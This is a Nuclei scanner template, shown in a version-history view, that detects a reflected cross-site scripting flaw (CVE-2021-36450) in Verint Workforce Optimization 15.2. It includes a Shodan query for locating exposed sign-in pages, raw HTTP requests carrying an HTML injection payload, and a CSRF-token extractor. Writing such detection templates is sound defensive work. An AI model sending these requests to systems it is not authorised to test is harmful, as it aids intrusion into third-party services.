nuclei-templates/cves/2021/CVE-2021-36450.yaml

68 lines
2.5 KiB
YAML
Raw Normal View History

2022-07-14 02:37:09 +00:00
id: CVE-2021-36450
info:
2022-07-14 07:57:13 +00:00
name: Verint 15.2 - Cross Site Scripting
2022-07-14 02:37:09 +00:00
author: atomiczsec
severity: medium
2022-07-14 07:57:13 +00:00
description: Verint Workforce Optimization (WFO) 15.2.8.10048 allows XSS via the control/my_notifications NEWUINAV parameter.
2022-07-14 02:37:09 +00:00
reference:
- https://medium.com/@1nf0sk/cve-2021-36450-cross-site-scripting-xss-6f5d8d7db740
- https://sushantvkamble.blogspot.com/2021/11/cross-site-scripting-xss.html
2022-07-14 07:57:13 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-36450
2022-07-14 02:37:09 +00:00
metadata:
2022-07-14 07:57:13 +00:00
verified: true
2022-07-14 02:37:09 +00:00
shodan-query: title:"Verint Sign-in"
classification:
cvss-metrics: AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
cve-id: CVE-2021-36450
cwe-id: CWE-79
2022-07-14 07:57:13 +00:00
tags: cve,cve2021,xss,verint
2022-07-14 02:37:09 +00:00
requests:
- raw:
2022-07-14 07:57:13 +00:00
- |
GET /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3C%2Fh1%3E26 HTTP/1.1
2022-07-14 02:37:09 +00:00
Host: {{Hostname}}
2022-07-14 07:57:13 +00:00
- |
POST /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3Ch1%3E%26 HTTP/1.1
Host: {{Hostname}}
Content-Length: 213
2022-07-14 02:37:09 +00:00
Cache-Control: max-age=0
2022-07-14 07:57:13 +00:00
Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="103", "Chromium";v="103"
2022-07-14 02:37:09 +00:00
Sec-Ch-Ua-Mobile: ?0
2022-07-14 07:57:13 +00:00
Sec-Ch-Ua-Platform: "macOS"
2022-07-14 02:37:09 +00:00
Upgrade-Insecure-Requests: 1
2022-07-14 07:57:13 +00:00
Origin: https://12.221.75.74
2022-07-14 02:37:09 +00:00
Content-Type: application/x-www-form-urlencoded
2022-07-14 07:57:13 +00:00
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
2022-07-14 02:37:09 +00:00
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
2022-07-14 07:57:13 +00:00
Referer: https://12.221.75.74/wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3Ch1%3E%26
2022-07-14 02:37:09 +00:00
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
2022-07-14 07:57:13 +00:00
browserCheckEnabled=true&username=admin&language=en_US&defaultHttpPort=80&screenHeight=1080&screenWidth=1920&pageModelType=0&pageDirty=false&pageAction=Login&csrfp_login={{csrfp_login}}
redirects: true
max-redirects: 2
cookie-reuse: true
2022-07-14 02:37:09 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-07-14 07:57:13 +00:00
- '"><h1>Test<h1>&" class="loginUserNameText'
extractors:
- type: regex
name: csrfp_login
group: 1
regex:
- 'csrfp_login=([a-zA-Z0-9]+);'